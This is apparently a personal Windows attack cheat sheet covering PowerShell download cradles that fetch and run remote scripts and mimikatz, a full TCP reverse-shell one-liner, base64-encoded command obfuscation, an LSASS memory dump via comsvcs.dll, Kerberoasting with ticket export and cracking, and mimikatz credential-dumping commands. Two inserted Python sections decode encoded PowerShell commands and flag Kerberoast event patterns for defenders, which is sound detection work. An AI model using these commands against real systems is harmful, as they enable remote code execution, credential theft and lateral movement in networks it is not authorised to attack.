Windows hacks
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DC_NAME:1433"
From a web shell:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
powershell IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.164/gori.ps1')

powershell IEX(New-Object Net.WebClient).DownloadString('http://192.168.119.181/gori.ps1')
Transfer mimikatz to a Temp directory:
(New-Object Net.WebClient).DownloadFile("http://192.168.119.181:8080/mimikatz.exe","C:\Windows\Temp\mimikatz.exe")
certutil -urlcache -split -f http://192.168.119.212:80/tcp_power.ps1 C:\backup\Scripts\backup_powershell.ps1
powershell (New-Object Net.WebClient).DownloadFile("http://192.168.119.188:8000/mimikatz.exe","C:\Windows\Users\Bethany\Documents\mimikatz.exe")
powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.119.146/newkb.ps1");Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
xp_cmdshell 'powershell IEX (New-Object Net.WebClient).DownloadString("http://192.168.119.146:8080/stable.ps1")'
$cred = New-Object System.Management.Automation.PSCredential('MSSQLSvc/DC_NAME\user', $secpasswd)  # $secpasswd must be a SecureString (e.g. from ConvertTo-SecureString)
If the reverse shell is not working:
To avoid bad-character problems in the reverse shell script (.ps1), first convert it to UTF-16LE (the encoding PowerShell expects for -EncodedCommand) and then base64-encode it:
cat reverse.ps1 | iconv -t UTF-16LE | base64 -w0
This converts the text to UTF-16 little-endian, then to base64.
Copy the output and pass it as the encoded command:
powershell.exe -nop -exec bypass -enc BASE64_COMMANDSSSSSS
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 536 C:\Users\administrator.xor\Desktop\lsass.dmp full
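The -enc recipe above is reversible, and that reversal is what an analyst does when these commands show up in process-creation logs. The following is an added detection example, not code from the original page: it decodes -EncodedCommand payloads (base64 of UTF-16LE) and flags the download-cradle and comsvcs.dll MiniDump indicators the commands on this page would leave behind. All log lines, the 192.0.2.10 address and the stage.ps1 name are constructed for the example.

```python
"""Added detection example (not from the original page): decode PowerShell
-EncodedCommand payloads in process-creation log lines and flag the
download-cradle and LSASS-dump indicators the commands on this page leave.
Every log line below is constructed for the example."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the value is base64 of the script text encoded as UTF-16LE.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|ec|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings typical of in-memory download cradles and comsvcs.dll LSASS dumps.
SUSPICIOUS_INDICATORS = (
    "DownloadString", "DownloadFile", "Invoke-Expression", "IEX", "Net.WebClient",
    "comsvcs.dll", "MiniDump",
)

# Constructed sample: a cradle like the ones on this page, encoded with the same
# UTF-16LE + base64 recipe so the sample matches what iconv/base64 would produce.
CRADLE = 'IEX (New-Object Net.WebClient).DownloadString("http://192.0.2.10/stage.ps1")'
SAMPLE_LOG_LINES = [
    # benign: plain script execution, no encoding, no cradle
    "CommandLine: powershell.exe -File C:\\Scripts\\backup.ps1",
    # encoded Get-Date (pre-computed UTF-16LE base64), harmless once decoded
    "CommandLine: powershell.exe -nop -exec bypass -enc RwBlAHQALQBEAGEAdABlAA==",
    # encoded download cradle
    "CommandLine: powershell.exe -NoP -NonI -ec "
    + base64.b64encode(CRADLE.encode("utf-16le")).decode("ascii"),
    # LSASS dump via comsvcs.dll, as on this page
    "CommandLine: rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 536 C:\\Windows\\Temp\\lsass.dmp full",
]


def decode_encoded_command(b64: str) -> str:
    """Reverse the `iconv -t UTF-16LE | base64 -w0` pipeline: base64 -> UTF-16LE -> text."""
    return base64.b64decode(b64, validate=True).decode("utf-16le")


def extract_encoded_command(cmdline: str):
    """Return the decoded -enc payload from a command line, or None if absent/undecodable."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        return decode_encoded_command(m.group(1))
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def find_indicators(text: str) -> list:
    """Case-insensitive substring match of the indicator list."""
    lowered = text.lower()
    return [ind for ind in SUSPICIOUS_INDICATORS if ind.lower() in lowered]


def analyze_command_line(cmdline: str) -> dict:
    """Decode any encoded payload and report indicators from both raw and decoded text."""
    decoded = extract_encoded_command(cmdline)
    indicators = set(find_indicators(cmdline))
    if decoded is not None:
        indicators |= set(find_indicators(decoded))
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": sorted(indicators, key=SUSPICIOUS_INDICATORS.index),
    }


def scan_log_lines(lines) -> list:
    """Return the analysis of every line that is encoded or carries an indicator."""
    hits = []
    for line in lines:
        result = analyze_command_line(line)
        if result["encoded"] or result["indicators"]:
            hits.append({"line": line, **result})
    return hits


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG_LINES):
        print(hit["indicators"], "<-", hit["decoded"] or hit["line"])
```

The encoded Get-Date line is reported because encoding alone is worth a look, but it carries no indicators; the encoded cradle only reveals DownloadString and IEX after decoding, which is why matching on the raw command line is not enough.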
1. Obtain SPN data with GetSPN.ps1 (take note of the service names and domain info).
2. Copy nc.exe to the Windows machine and get a stable reverse shell back.
3. Once stable, open PowerShell and run:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "Servicename/domain:port"
4. Open mimikatz (make sure you have the right version for the OS: 32-bit or 64-bit) and dump the Kerberos tickets:
kerberos::list /export
This exports all the tickets; the resulting .kirbi files are saved on the victim's computer.
5. Copy the files over to Kali and convert them to hashcat form with kirbi2john.py.
Cracking a ticket:
python3 /home/kali/Downloads/kerberoast-master/tgsrepcrack.py ~/rockyou.txt kirby.kirby
6. Once cracked, you can try to log in to the account with evil-winrm (use the service name you obtained in step 1):
❯ ./evil-winrm.rb -i IP -u User -p PASS
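Step 3 of the procedure above asks the domain controller for service tickets, and the DC records each request as Security event 4769. The following is an added detection example, not part of the original page: it flags the Kerberoast pattern of one account requesting RC4-HMAC (etype 0x17) tickets for several distinct service accounts, while ignoring machine accounts, krbtgt and AES requests. The event records, account names and the CORP.EXAMPLE realm are constructed for the example; in a real 4769 the Service Name field holds the service's account name, which is what the sample mirrors.

```python
"""Added detection example (not from the original page): flag Kerberoast-style
TGS activity in Windows Security event 4769 records. Kerberoast tooling asks for
service tickets encrypted with RC4-HMAC (etype 0x17), so one account pulling RC4
tickets for several service accounts is the signal. Records are constructed."""
from collections import defaultdict

RC4_HMAC = "0x17"  # legacy etype 23, the cipher Kerberoast tooling requests

# Constructed 4769/4768 records in a flattened key=value form (not real log data).
# ServiceName holds the service's account name, as the real event does.
EVENT_LINES = [
    "EventID=4769 AccountName=alice@CORP.EXAMPLE ServiceName=svc_sql TicketEncryptionType=0x17 FailureCode=0x0",
    "EventID=4769 AccountName=alice@CORP.EXAMPLE ServiceName=svc_web TicketEncryptionType=0x17 FailureCode=0x0",
    "EventID=4769 AccountName=alice@CORP.EXAMPLE ServiceName=svc_backup TicketEncryptionType=0x17 FailureCode=0x0",
    # AES ticket (0x12): normal for a modern client, not the Kerberoast pattern
    "EventID=4769 AccountName=bob@CORP.EXAMPLE ServiceName=svc_sql TicketEncryptionType=0x12 FailureCode=0x0",
    # machine-to-machine request: computer accounts have random passwords, not roastable
    "EventID=4769 AccountName=WS01$@CORP.EXAMPLE ServiceName=WS02$ TicketEncryptionType=0x17 FailureCode=0x0",
    # krbtgt is the TGT service, excluded from the count
    "EventID=4769 AccountName=alice@CORP.EXAMPLE ServiceName=krbtgt TicketEncryptionType=0x17 FailureCode=0x0",
    # 4768 is a TGT request, not a service-ticket request
    "EventID=4768 AccountName=alice@CORP.EXAMPLE ServiceName=krbtgt TicketEncryptionType=0x12 FailureCode=0x0",
]


def parse_event(line: str) -> dict:
    """Split a flattened key=value record into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def is_roastable_request(event: dict) -> bool:
    """True for a successful 4769 with RC4 encryption against a user-type service account."""
    if event.get("EventID") != "4769" or event.get("FailureCode") != "0x0":
        return False
    if event.get("TicketEncryptionType") != RC4_HMAC:
        return False
    service = event.get("ServiceName", "")
    # machine accounts end in '$'; krbtgt is the TGT service, not a roast target
    return not service.endswith("$") and service.lower() != "krbtgt"


def kerberoast_candidates(lines, min_distinct_services: int = 2) -> dict:
    """Map each requesting account to the sorted service accounts it pulled RC4
    tickets for, keeping only accounts at or above the threshold."""
    per_account = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if is_roastable_request(ev):
            per_account[ev["AccountName"]].add(ev["ServiceName"])
    return {acct: sorted(svcs) for acct, svcs in per_account.items()
            if len(svcs) >= min_distinct_services}


if __name__ == "__main__":
    for acct, services in kerberoast_candidates(EVENT_LINES).items():
        print(f"{acct} requested RC4 service tickets for: {', '.join(services)}")
```

The threshold exists because a single RC4 request can be a legitimate legacy service; a real rule also bounds the count by time window and suppresses service accounts known to be RC4-only, but the artifact itself is the same one the KerberosRequestorSecurityToken call in step 3 produces.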
Mimikatz console (multiple commands)
PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # log
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz # lsadump::sam
mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest
mimikatz cheatsheet:
Then use psexec.py or evil-winrm to get into the admin shell.